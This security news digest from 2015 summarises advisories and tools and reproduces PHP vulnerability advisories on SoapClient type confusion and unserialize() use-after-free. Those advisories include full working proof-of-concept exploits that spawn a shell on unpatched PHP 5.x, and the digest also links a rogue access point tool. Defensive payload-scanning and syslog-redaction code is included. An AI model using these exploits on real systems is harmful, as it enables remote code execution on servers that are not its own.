Channel: BOT24

Shellcode

This is a repository of Shellcode written by students in NYU-Polytechnic's ISIS lab. This repository came about as a need for trustworthy and reliable 32/64 bit Intel shellcode for CTF style exploitation.
more here.....https://github.com/isislab/Shellcode

Valuable information on Kimble and Verto, Evolution Source Code, SQL Dump

This may pique your curiosity regarding the valuable info posted here........ https://www.reddit.com/r/DarkNetMarkets/comments/2zlju6/valuable_information_on_kimble_and_verto/
For those not familiar with this story, you may want to read the article titled "A $50m Drug And Gun Dark Web Market Just Disappeared And Millions In Bitcoin With It" here....http://www.forbes.com/sites/thomasbrewster/2015/03/18/evolution-market-a-scam-says-site-pr/

Threat Spotlight: PoSeidon, A Deep Dive Into Point of Sale Malware

When consumers make purchases from a retailer, the transaction is processed through Point-of-Sale (PoS) systems. When a credit or debit card is used, a PoS system is used to read the information stored on the magnetic stripe on the back of the credit card. Once this information gets stolen from a merchant, it can be encoded into a magnetic stripe and used with a new card. Criminal markets exist for this valuable information because the attackers are able to easily monetize stolen credit card data. Incidents involving PoS malware have been on the rise, affecting many large organizations as well as small mom-and-pop establishments and garnering a lot of media attention. The presence of large amounts of financial and personal information ensures that these companies and their retail PoS systems will remain attractive targets.

more here........http://blogs.cisco.com/security/talos/poseidon

Paper: Understanding Digital Intelligence and the Norms That Might Govern It

This paper describes the nature of digital intelligence and provides context for the material published as a result of the actions of National Security Agency contractor Edward Snowden. It looks at the dynamic interaction between demands from government and law enforcement for digital intelligence, and at the new possibilities that digital technology has opened up for meeting such demands. The adequacy of previous regimes of legal powers and governance arrangements is seriously challenged just at a time when the objective need for intelligence on the serious threats facing civil society is apparent. This paper suggests areas where it might be possible to derive international norms, regarded as promoting standards of accepted behaviour that might gain widespread, if not universal, international acceptance, for the safe practice of digital intelligence.

more here..........https://www.cigionline.org/sites/default/files/gcig_paper_no8.pdf

Type Confusion Infoleak Vulnerabilities in SoapClient

# Type Confusion Infoleak Vulnerabilities in SoapClient

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1 - Release Date: 2015.3.20

> Four type confusion vulnerabilities were discovered in some methods of the SoapClient object that can be abused for leaking arbitrary memory blocks.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
PHP_METHOD(SoapClient, __getLastRequest)
{
        zval **tmp;

        if (zend_parse_parameters_none() == FAILURE) {
                return;
        }

        if (zend_hash_find(Z_OBJPROP_P(this_ptr), "__last_request",
                           sizeof("__last_request"), (void **)&tmp) == SUCCESS) {
                RETURN_STRINGL(Z_STRVAL_PP(tmp), Z_STRLEN_PP(tmp), 1);
        }
        RETURN_NULL();
}
```

The Z_STRVAL_PP macro leads to an arbitrary valid memory address being
read, via a double-type or integer-type zval, and the bytes starting at
that address being returned as a string. If the address is an invalid
memory position, the result is a crash.

The Z_STRLEN_PP macro reads the str.len member of the zvalue_value
union and returns it as the string's length. For an integer-type zval
Z_STRLEN_PP generally returns 1, so an integer-type zval can impersonate
a string of length 1. A double is 8 bytes, so on a 32-bit system a
double-type zval can impersonate a string of any length, since its 8
bytes cover both the str.val pointer and the str.len field of the union.

Very similar bugs exist in the SoapClient object's __getLastResponse(),
__getLastRequestHeaders(), and __getLastResponseHeaders() methods.

Proof of Concept Exploit
------------
The PoC works on a standard Mac OS X 10.10.3 installation of PHP 5.5.14.

```
<?php

$z = new SoapClient(null, array('location' => "", 'uri' => ""));
$str = '';
for ($i = 0x100351e3d; $i < 0x100351e3d + 25; $i++) {
    $z->__last_request = $i;
    $str .= $z->__getLastRequest();
}
var_dump($str);

?>
```

Running the PoC on the command line dumps some memory blocks:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run test.php
Process 6366 launched: '/usr/bin/php' (x86_64)
string(25) "UH??AWAVSPI??I??H????
                                 H"
Process 6366 exited with status = 0 (0x00000000)
```

Type Confusion Vulnerability in SoapClient

# Type Confusion Vulnerability in SoapClient

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.3.1 - Release Date: 2015.3.20

> A type confusion vulnerability was discovered in the SoapClient object's __getCookies() method that can be abused for leaking arbitrary memory blocks or executing arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------
```
PHP_METHOD(SoapClient, __getCookies)
{
        zval **cookies, *tmp;

        if (zend_parse_parameters_none() == FAILURE) {
                return;
        }

        array_init(return_value);

        if (zend_hash_find(Z_OBJPROP_P(this_ptr), "_cookies",
                           sizeof("_cookies"), (void **)&cookies) != FAILURE) {
                zend_hash_copy(Z_ARRVAL_P(return_value), Z_ARRVAL_P(*cookies),
                               (copy_ctor_func_t) zval_add_ref, (void *)&tmp, sizeof(zval*));
        }
}
```

Through the Z_ARRVAL_P macro a non-array _cookies property is
dereferenced as an array, so a fake array-type zval can point at a fake
HashTable and a fake Bucket in memory. This can result in arbitrary code
execution.

Proof of Concept Exploit
------------
The PoC works on a standard Mac OS X 10.10.3 installation of PHP 5.5.14.

```
<?php

ini_set("memory_limit", -1);

if ($_SERVER['argc'] < 2) {
        $_SERVER['argv'][1] = 'system(sh);exit;';
}

setup_memory();

$exploit = 'O:10:"SoapClient":1:{s:8:"_cookies";s:'.strlen($hashtable).':"'.$hashtable.'";}';
$z = unserialize($exploit);
// $z = new SoapClient(null, array('location' => "", 'uri' => ""));
// $z->_cookies = $hashtable;
$z->__getCookies();

function setup_memory()
{
        global $str, $hashtable;

        $base = 0x114000020;
        $bucket_addr = $base;
        $zval_delta = 0x100;
        $hashtable_delta = 0x200;
        $zval_addr = $base + $zval_delta;
        $hashtable_addr = $base + $hashtable_delta;
        $func_addr = 0x100351e3d; // zend_eval_string()'s address

        $bucket  = "\x01\x00\x00\x00\x00\x00\x00\x00";
        $bucket .= "\x00\x00\x00\x00\x00\x00\x00\x00";
        $bucket .= ptr2str($bucket_addr + 3*8);
        $bucket .= ptr2str($zval_addr);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);
        $bucket .= ptr2str(0);

        $hashtable  = "\x00\x00\x00\x00";
        $hashtable .= "\x00\x00\x00\x00";
        $hashtable .= "\x01\x00\x00\x00";
        $hashtable .= "\x00\x00\x00\x00";
        $hashtable .= "\x00\x00\x00\x00\x00\x00\x00\x00";
        $hashtable .= ptr2str(0);
        $hashtable .= ptr2str($bucket_addr);
        $hashtable .= ptr2str(0);
        $hashtable .= ptr2str(0);
        $hashtable .= ptr2str(0);
        $hashtable .= "\x00";
        $hashtable .= "\x00";

        $zval = ptr2str($hashtable_addr);
        $zval .= ptr2str(0);
        $zval .= "\x00\x00\x00\x00";
        $zval .= "\x04";
        $zval .= "\x00";
        $zval .= ptr2str(0);
        $zval .= ptr2str(0);
        $zval .= ptr2str(0);

        $shellcode = ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str($hashtable_addr + 6*8);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str(0);
        $shellcode .= ptr2str($func_addr);
        $shellcode .= ptr2str($hashtable_addr + 9*8);
        $shellcode .= "\x65\x76\x61\x6c\x28\x24\x5f\x53\x45\x52\x56\x45\x52\x5b\x27\x61\x72\x67\x76\x27\x5d\x5b\x31\x5d\x29\x3b\x00";
// eval($_SERVER['argv'][1]);

        $part = str_repeat("\x73", 4096);
        for ($j=0; $j<strlen($bucket); $j++) {
                $part[$j] = $bucket[$j];
        }
        for ($j=0; $j<strlen($shellcode); $j++) {
                $part[$j+$hashtable_delta] = $shellcode[$j];
        }
        for ($j=0; $j<strlen($zval); $j++) {
                $part[$j+$zval_delta] = $zval[$j];
        }

        $str = str_repeat($part, 1024*1024*256/4096);
}

function ptr2str($ptr)
{
        $out = "";
        for ($i=0; $i<8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

?>
```

Running the PoC on the command line executes arbitrary PHP code:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run tcpoc.php 'system\(sh\)\;exit\;'
Process 2606 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Jan  8 2015 22:33:37)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 2606 exited with status = 0 (0x00000000)
(lldb)
```

Use After Free Vulnerability in unserialize() with DateInterval

# Use After Free Vulnerability in unserialize() with DateInterval

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.2.28 - Release Date: 2015.3.20

> A use-after-free vulnerability was discovered in unserialize() with the DateInterval object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or executing arbitrary code remotely.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5.3 <= 5.3.29

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
static int php_date_interval_initialize_from_hash(zval **return_value,
php_interval_obj **intobj, HashTable *myht TSRMLS_DC)
{
        (*intobj)->diff = timelib_rel_time_ctor();

#define PHP_DATE_INTERVAL_READ_PROPERTY(element, member, itype, def) \
        do { \
                zval **z_arg = NULL; \
                if (zend_hash_find(myht, element, strlen(element) + 1, \
                                   (void**)&z_arg) == SUCCESS) { \
                        convert_to_long(*z_arg); \
                        (*intobj)->diff->member = (itype)Z_LVAL_PP(z_arg); \
                } else { \
                        (*intobj)->diff->member = (itype)def; \
                } \
        } while (0);

#define PHP_DATE_INTERVAL_READ_PROPERTY_I64(element, member) \
        do { \
                zval **z_arg = NULL; \
                if (zend_hash_find(myht, element, strlen(element) + 1, \
                                   (void**)&z_arg) == SUCCESS) { \
                        convert_to_string(*z_arg); \
                        DATE_A64I((*intobj)->diff->member, Z_STRVAL_PP(z_arg)); \
                } else { \
                        (*intobj)->diff->member = -1LL; \
                } \
        } while (0);
```

The convert_to_long()/convert_to_string() calls free the zval and all
its children from memory. However, the unserialize() code will still
allow R: or r: to set references to that already freed memory. This is
a use-after-free vulnerability, and it allows arbitrary code execution.

Proof of Concept Exploit
------------
The PoC works on a standard Mac OS X 10.10.2 installation of PHP 5.5.14.

```
<?php

$f = $argv[1];
$c = $argv[2];

$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";

$data1 = 'a:3:{i:0;O:12:"DateInterval":1:{s:1:"y";a:2:{i:0;i:1;i:1;i:2;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:5;}}';

$x = unserialize($data1);
$y = $x[2];

// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";

$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\x00\x00\x00\x00";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";

$data2 = 'a:3:{i:0;O:12:"DateInterval":1:{s:1:"y";a:2:{i:0;i:1;i:1;i:2;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;O:12:"DateInterval":1:{s:1:"y";a:1:{i:0;R:5;}}}';

$z = unserialize($data2);

function ptr2str($ptr)
{
        $out = "";
        for ($i=0; $i<8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

?>
```

Running the PoC on the command line executes arbitrary PHP code:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)
```

Use After Free Vulnerability in unserialize()

# Use After Free Vulnerability in unserialize()

Taoguang Chen <[@chtg](http://github.com/chtg)> - Write Date: 2015.2.3 - Release Date: 2015.3.20

> A use-after-free vulnerability was discovered in unserialize() with a specially defined object's __wakeup() magic method that can be abused for leaking arbitrary memory blocks or executing arbitrary code.

Affected Versions
------------
Affected is PHP 5.6 < 5.6.7
Affected is PHP 5.5 < 5.5.23
Affected is PHP 5.4 < 5.4.39
Affected is PHP 5 <= 5.3.29
Affected is PHP 4 <= 4.4.9

Credits
------------
This vulnerability was disclosed by Taoguang Chen.

Description
------------

```
static inline int object_common2(UNSERIALIZE_PARAMETER, zend_long elements)
{
        zval retval;
        zval fname;

        if (Z_TYPE_P(rval) != IS_OBJECT) {
                return 0;
        }

        //??? TODO: resize before
        if (!process_nested_data(UNSERIALIZE_PASSTHRU, Z_OBJPROP_P(rval),
                                 elements, 1)) {
                return 0;
        }

        ZVAL_DEREF(rval);
        if (Z_OBJCE_P(rval) != PHP_IC_ENTRY &&
                zend_hash_str_exists(&Z_OBJCE_P(rval)->function_table, "__wakeup",
                                     sizeof("__wakeup")-1)) {
                ZVAL_STRINGL(&fname, "__wakeup", sizeof("__wakeup") - 1);
                BG(serialize_lock)++;
                call_user_function_ex(CG(function_table), rval, &fname, &retval, 0,
                                      0, 1, NULL);
```

A specially defined __wakeup() magic method leads to various problems.

A simple example:

```
<?php

class evilClass {

        public $var;

        function __wakeup() {
                unset($this->var);
//              $this->var = 'ryat';
        }
}

$data = unserialize('a:2:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;R:4;}');

?>
```

Assigning or destroying an object property in __wakeup() frees the zval
and all its children from memory. However, the unserialize() code will
still allow R: or r: to set references to that already freed memory.
This is a use-after-free vulnerability, and it allows arbitrary code
execution.

Proof of Concept Exploit
------------
The PoC works on a standard Mac OS X 10.10.2 installation of PHP 5.5.14.

```
<?php

$f = $argv[1];
$c = $argv[2];

$fakezval1 = ptr2str(0x100b83008);
$fakezval1 .= ptr2str(0x8);
$fakezval1 .= "\x00\x00\x00\x00";
$fakezval1 .= "\x06";
$fakezval1 .= "\x00";
$fakezval1 .= "\x00\x00";

$data1 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval1).':"'.$fakezval1.'";i:2;a:1:{i:0;R:4;}}';

$x = unserialize($data1);
$y = $x[2];

// zend_eval_string()'s address
$y[0][0] = "\x6d";
$y[0][1] = "\x1e";
$y[0][2] = "\x35";
$y[0][3] = "\x00";
$y[0][4] = "\x01";
$y[0][5] = "\x00";
$y[0][6] = "\x00";
$y[0][7] = "\x00";

$fakezval2 = ptr2str(0x3b296324286624); // $f($c);
$fakezval2 .= ptr2str(0x100b83000);
$fakezval2 .= "\xff\xff\xff\xff";
$fakezval2 .= "\x05";
$fakezval2 .= "\x00";
$fakezval2 .= "\x00\x00";

$data2 = 'a:3:{i:0;O:9:"evilClass":1:{s:3:"var";a:1:{i:0;i:1;}}i:1;s:'.strlen($fakezval2).':"'.$fakezval2.'";i:2;a:1:{i:0;R:4;}}}';

$z = unserialize($data2);
intval($z[2]);

function ptr2str($ptr)
{
        $out = "";
        for ($i=0; $i<8; $i++) {
                $out .= chr($ptr & 0xff);
                $ptr >>= 8;
        }
        return $out;
}

class evilClass {

        public $var;

        function __wakeup() {
                unset($this->var);
//              $this->var = 'ryat';
        }
}

?>
```

Running the PoC on the command line executes arbitrary PHP code:

```
$ lldb php
(lldb) target create "php"
Current executable set to 'php' (x86_64).
(lldb) run uafpoc.php assert "system\('sh'\)==exit\(\)"
Process 13472 launched: '/usr/bin/php' (x86_64)
sh: no job control in this shell
sh-3.2$ php -v
PHP 5.5.14 (cli) (built: Sep  9 2014 19:09:25)
Copyright (c) 1997-2014 The PHP Group
Zend Engine v2.5.0, Copyright (c) 1998-2014 Zend Technologies
sh-3.2$ exit
exit
Process 13472 exited with status = 0 (0x00000000)
(lldb)
```

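The two unserialize() advisories above and the SoapClient __getCookies() PoC all feed unserialize() an object together with either an R:/r: back-reference into that object's properties or a string carrying a fake zval. The scanner below is an added example, not code from Taoguang Chen's advisories: it parses the serialize() format with the PHP 5 rules for which values a reference can name and flags exactly those ingredients before a payload reaches unserialize(); the class watchlist and the `risky()` policy are this example's own choices.

```python
import string

WATCHED_CLASSES = {"SoapClient", "DateInterval"}   # classes named in the advisories
PRINTABLE = set(string.printable.encode())

class PhpSerialParser:
    """Recursive-descent parser for PHP's serialize() format (PHP 5 slot rules)."""
    def __init__(self, data: bytes):
        self.data, self.pos, self.findings = data, 0, []   # findings: (offset, kind, detail)
        self.slot, self.slots, self.obj_depth = 0, {}, 0   # slots: R:n target -> in an object?

    def _expect(self, ch: bytes) -> None:
        if self.data[self.pos:self.pos + 1] != ch:
            raise ValueError(f"expected {ch!r} at offset {self.pos}")
        self.pos += 1

    def _read_until(self, ch: bytes) -> bytes:
        end = self.data.index(ch, self.pos)
        tok, self.pos = self.data[self.pos:end], end + 1
        return tok

    def _read_string(self) -> bytes:
        length = int(self._read_until(b":"))
        if length < 0:
            raise ValueError(f"negative length at offset {self.pos}")
        self._expect(b'"')
        s, self.pos = self.data[self.pos:self.pos + length], self.pos + length
        self._expect(b'"')       # also fails when the declared length overruns the data
        return s

    def _members(self, count: int) -> dict:
        self._expect(b"{")
        out = {}
        for _ in range(count):
            key = self.value(register=False)   # keys never take a slot
            out[key] = self.value()
        self._expect(b"}")
        return out

    def value(self, register: bool = True):
        start = self.pos
        t = self.data[start:start + 1]
        self.pos += 1
        if register and t != b"R":   # PHP 5 pushes every value except R: itself
            self.slot += 1
            self.slots[self.slot] = self.obj_depth > 0
        if t == b"N":
            self._expect(b";")
            return None
        self._expect(b":")
        if t in (b"b", b"i", b"d"):
            return self._read_until(b";")            # the scalar's text is enough here
        if t == b"s":
            s = self._read_string()
            self._expect(b";")
            if any(b not in PRINTABLE for b in s):   # fake zvals travel as raw bytes
                self.findings.append((start, "binary-string", len(s)))
            return s
        if t in (b"R", b"r"):
            target = int(self._read_until(b";"))
            kind = "reference-into-object" if self.slots.get(target) else "reference"
            self.findings.append((start, kind, target))
            return ("ref", target)
        if t == b"a":
            return self._members(int(self._read_until(b":")))
        if t == b"O":
            cls = self._read_string().decode("latin-1")
            self._expect(b":")
            count = int(self._read_until(b":"))
            self.findings.append((start, "object", cls))
            self.obj_depth += 1      # members below can be freed by the class's __wakeup()
            members = self._members(count)
            self.obj_depth -= 1
            return (cls, members)
        raise ValueError(f"unsupported type {t!r} at offset {start}")

def scan(payload: bytes) -> list:
    """Return the findings for one payload; a parse failure is itself a finding."""
    p = PhpSerialParser(payload)
    try:
        p.value()
    except (ValueError, TypeError) as e:
        p.findings.append((p.pos, "malformed", str(e)))
    return p.findings

def risky(payload: bytes) -> bool:
    """Example policy: any pattern the advisories rely on rejects the payload."""
    return any(k in ("reference-into-object", "binary-string", "malformed")
               or (k == "object" and d in WATCHED_CLASSES) for _, k, d in scan(payload))
```

Run against the evilClass payload from the advisory, `scan()` reports the object at offset 9 and the R:4 reference at offset 57 as pointing into that object's properties, which is the shape both use-after-free PoCs share.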
Automated algebraic cryptanalysis with OpenREIL and Z3

One week ago I released my OpenREIL project, an open source implementation of the well-known Reverse Engineering Intermediate Language (REIL). The OpenREIL library has many more features than just binary to IR (intermediate representation) translation; you can check the documentation to learn how to use it and what it can do. In this blog post I want to demonstrate a practical example of using OpenREIL to solve the Kao's Toy Project crackme puzzle with automated algebraic cryptanalysis.

more here.........http://blog.cr4.sh/2015/03/automated-algebraic-cryptanalysis-with.html

XML External Entity (XXE) Injection in Apache Batik Library [CVE-2015-0250]

During one of our latest web application code review projects I came across a vulnerability which I think is worth speaking about. It is an injection-based attack against XML parsers which uses a rarely required feature called external entity expansion. The XML specification allows XML documents to define entities which reference resources external to the document, and parsers typically support this feature by default. If an application parses XML input from untrusted sources and the parsing routine is not properly configured, this can be exploited by an attacker with a so-called XML external entity (XXE) injection. A successful XXE injection attack could allow an attacker to access the file system, cause a DoS attack or inject script code (e.g. Javascript to perform an XSS attack).

more here.......http://www.insinuator.net/2015/03/xxe-injection-in-apache-batik-library-cve-2015-0250/

Paper: Introduction to Modern Code Virtualization

This paper describes how code protection is done via “virtual machines” and techniques used in popular virtual machines, giving a considerable level of understanding of such virtual machines for readers from beginners to professionals.


more here..............http://www.scribd.com/doc/222907805/Introduction-to-Modern-Code-Virtualization

Office Alerts: Yes, We Care About These

In this short post, I wanted to take a few and examine a fun little artifact: OAlerts.evtx. Is this a "new" artifact? No, not necessarily. However, I think there can be a wealth of information within this artifact if it relates to what you're trying to find. As forensic investigators continue to find out more about user interaction while on a certain box, this event log may or may not assist you in recreating those timelines.

While an entire book could be written to go over the forensic value of each event log (hmm...), I recently had some success within OAlerts.evtx. Seeing as I couldn't find much else in the form of write-ups (simple Google search), I figured I'd share my experience with others here......http://www.505forensics.com/office-alerts-we-care-about-these/

3vilTwinAttacker v0.5.3 Release

This tool creates a rogue Wi-Fi access point, purporting to provide wireless Internet services while snooping on the traffic.

more here.......https://github.com/P0cL4bs/3vilTwinAttacker

PaX Refcount Protection Explained Documentation

Abstract

This document defines the inner workings of PaX's reference counter protection and aims to create a bigger community around the project.

It begins with an overview of the PaX Project and reference counter protection, goes into a higher-level explanation of how it is implemented, and then goes deep inside the implementation's code, enabling readers to more easily port the feature to new platforms.

Special focus is placed on the reasoning for the PowerPC implementation, developed by the author while learning the internals of this protection mechanism.

more here......https://forums.grsecurity.net/viewtopic.php?f=7&t=4173#p15110

Detect System File Manipulations with SysInternals Sysmon

SysInternals Sysmon is a powerful tool especially when it comes to anomaly detection. I recently developed a method to detect system file manipulations, which I would like to share with you.

We know how to track processes with the standard Windows audit policy option “Audit process tracking”, but Sysmon messages contain much more information to evaluate. By using Sysmon on many systems within the network and collecting all the logs in a central location you’ll get a database full of interesting attributes and metadata which can be statistically analyzed in order to identify anomalies.

more here........https://www.bsk-consulting.de/2015/03/21/detect-system-file-manipulations-with-sysinternals-sysmon/

oclHashcat v1.34 release

This version 1.34 is about performance increase and bug fixes. Even if you did not face any errors with v1.33 we recommend upgrading.

more here.........https://hashcat.net/forum/thread-4203.html

Defeating EMET 5.2 Protections (2)

Since my last post, I've thought maybe it's not bad to explain how bypassing EMET protections works rather than giving out a weaponized POC here.......http://casual-scrutiny.blogspot.in/2015/03/defeating-emet-52-protections-2.html

Few days old but didn't see this until now "Court Orders Erie County Sheriff to Disclose Use of Stingray Surveillance Device"

In a victory for the public’s right to know, a Supreme Court judge in Buffalo this afternoon ruled that the Erie County Sheriff’s Office must disclose public information about “stingrays,” devices that can track and record New Yorkers’ locations via their cell phones. The New York Civil Liberties Union sued the Sheriff’s Office in November for failing to follow the law and respond to public information about how it uses the devices.

more here.........http://www.nyclu.org/news/court-orders-erie-county-sheriff-disclose-use-of-stingray-surveillance-device

On the state of cryptography in Haskell

In the past months, I was attempting to write an application that uses cryptographic primitives in Haskell. In the process I found out some disturbing things about the state of cryptography in Haskell of which I think more people should be aware. I am trying to present you with as many facts as possible, but I will also draw my own conclusions from these facts. My conclusions are fairly paranoid, since I think developing crypto software requires a certain level of professional paranoia. You might not necessarily agree with this and are free to draw your own conclusions.

more here........http://www.leonmergen.com/haskell/crypto/2015/03/21/on-the-state-of-cryptography-in-haskell.html

Cisco Unified Computing System Manager (UCSM) username and password hashes sent via SYSLOG

Subject:  Cisco UCSM username and password hashes sent via SYSLOG

Impact:   Information Disclosure / Privilege Elevation

Vendor:   Cisco
Product:  Cisco Unified Computing System Manager (UCSM)
Notified: 2014.10.31
Fixed:    2015.03.06 ( 2.2(3e) )

Author:   Tom Sellers ( tom at fadedcode.net )
Date:     2015.03.21


Description:
============

Cisco Unified Computing System Manager (UCSM) versions 1.3 through 2.2 sends local (UCSM) username and password hashes to the configured SYSLOG server every 12 hours. If the Fabric Interconnects are in a cluster then each member will transmit the data.


SYSLOG Example ( portions of password hash replaced with <!snip!> ):


Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:User1,$1$e<!snip!>E.,-1.000000,16372.000000 - securityd
Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:admin,$1$J<!snip!>71,-1.000000,16372.000000 - securityd
Oct 28 23:31:37 xxx.Xxx.xxx.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: checking user:samdme,!,-1.000000,16372.000000 - securityd


Vulnerable environment(s):
==========================

Cisco Unified Computing System Manager (UCSM) is a Cisco product that manages all aspects of the Unified Computing System (UCS) environment including Fabric Interconnects, B-Series blade servers and the related blade chassis.  C-Series (non-blade) servers can also be managed.  These solutions are deployed in high performance / high density compute solutions and allow for policy based and rapid deployment of resources.  They are typically found in Data Center class environments with 10/40 GB network and 8/16 GB Fibre Channel connectivity.


Software Versions:  1.3 - 2.2(1b)A

Hardware:  Cisco 6120 XP, 6296 UP


SYSLOG Configuration:

- Level:    Information
- Facility: Local7

- Faults: Enabled
- Audits: Enabled
- Events: Disabled


Risks:
======
1. Individuals who have access to the SYSLOG logs may not be authorized to have access to the UCSM environment and this information represents an exposure.

2. Authorized users with the 'Operations' roles can configure SYSLOG settings, capture hashes, crack them, and elevate access to Administrator within the UCSM.

3. SYSLOG is transmitted in plain text.
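
One way a log pipeline could catch these messages and strip the hash before storage, added as an example that is not part of Tom Sellers' advisory: the regular expression follows the message shape quoted above, the sample lines are constructed (RFC 5737 test address, made-up hashes), and reading "!" as "no usable password hash" is this example's assumption.

```python
import re

# Shape of the securityd message quoted in the advisory:
#   ... %USER-6-SYSTEM_MSG: checking user:<user>,<hash or !>,<num>,<num> - securityd
CHECKING_USER = re.compile(
    r"%USER-\d-SYSTEM_MSG: checking user:(?P<user>[^,]+),(?P<hash>[^,]*),"
    r"(?P<f1>[^,]+),(?P<f2>\S+) - securityd"
)

# Constructed sample lines in the advisory's format: RFC 5737 test address,
# made-up hashes; the last line is a different securityd message.
SAMPLE_LINES = [
    "Oct 28 23:31:37 192.0.2.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:User1,$1$saltsalt$abcdefghijklmnopqrstuv,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:37 192.0.2.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:admin,$1$xyzxyzxy$ABCDEFGHIJKLMNOPQRSTUV,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:37 192.0.2.242 : 2014 Oct 28 23:49:15 CDT: %USER-6-SYSTEM_MSG: "
    "checking user:samdme,!,-1.000000,16372.000000 - securityd",
    "Oct 28 23:31:38 192.0.2.242 : 2014 Oct 28 23:49:16 CDT: %USER-6-SYSTEM_MSG: "
    "some unrelated message - securityd",
]

def parse_checking_user(line: str):
    """Return the account name and whether a crypt-style hash was leaked, or None."""
    m = CHECKING_USER.search(line)
    if not m:
        return None
    h = m.group("hash")
    # A crypt(3) hash starts with "$<id>$" ($1$ is MD5-crypt); "!" is read here as
    # "no usable password hash", an assumption borrowed from the shadow(5) convention.
    return {"user": m.group("user"), "has_hash": h.startswith("$"), "span": m.span("hash")}

def redact(line: str) -> str:
    """Mask the hash field so the line can be stored without the secret."""
    info = parse_checking_user(line)
    if not info or not info["has_hash"]:
        return line
    start, end = info["span"]
    scheme = line[start:end].split("$")[1]      # keep "$1$" so the scheme stays visible
    return f"{line[:start]}${scheme}$<redacted>{line[end:]}"

def triage(lines):
    """Summarise a batch: accounts whose hashes were exposed, plus sanitised lines."""
    exposed, clean = [], []
    for line in lines:
        info = parse_checking_user(line)
        if info and info["has_hash"]:
            exposed.append(info["user"])
        clean.append(redact(line))
    return {"hash_users": exposed, "sanitised": clean}
```

The list of exposed accounts is what an incident responder needs for forced password rotation (risk 1 and 2 above), and the sanitised lines are what should reach the log store.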


Submitter recommendations to vendor:
====================================
1. Remove the username and password hash data from the SYSLOG output.

2. Allow the configuration of the SYSLOG destination port to enable easier segmentation of SYSLOG data on the log aggregation system.

3. Add support for TLS wrapped SYSLOG output.


Vendor response/resolution:
==========================
After being reported on October 30, 2014 the issue was handed from Cisco PSIRT to internal development where it was treated as a standard bug.  Neither the PSIRT nor Cisco TAC were able to determine the status of the effort other than it was in progress with an undetermined release date.  On March 6, 2015 version 2.2(3e) of the UCSM software bundle was released and the release notes contained the following text:

---
Cisco UCS Manager Release 1.3 through Release 2.2 no longer sends UCS Manager username and password hashes to the configured SYSLOG server every 12 hours.
---

For several weeks a document related to this issue could be found in the Cisco Security Advisories, Responses, and Alerts site [1] but this has since been removed.

Documents detailing similar issues [2] have been released but none reference the Bug/Defect ID I was provided and the affected versions do not match.

The following documents remain available:

Public URL for Defect:        https://tools.cisco.com/quickview/bug/CSCur54705
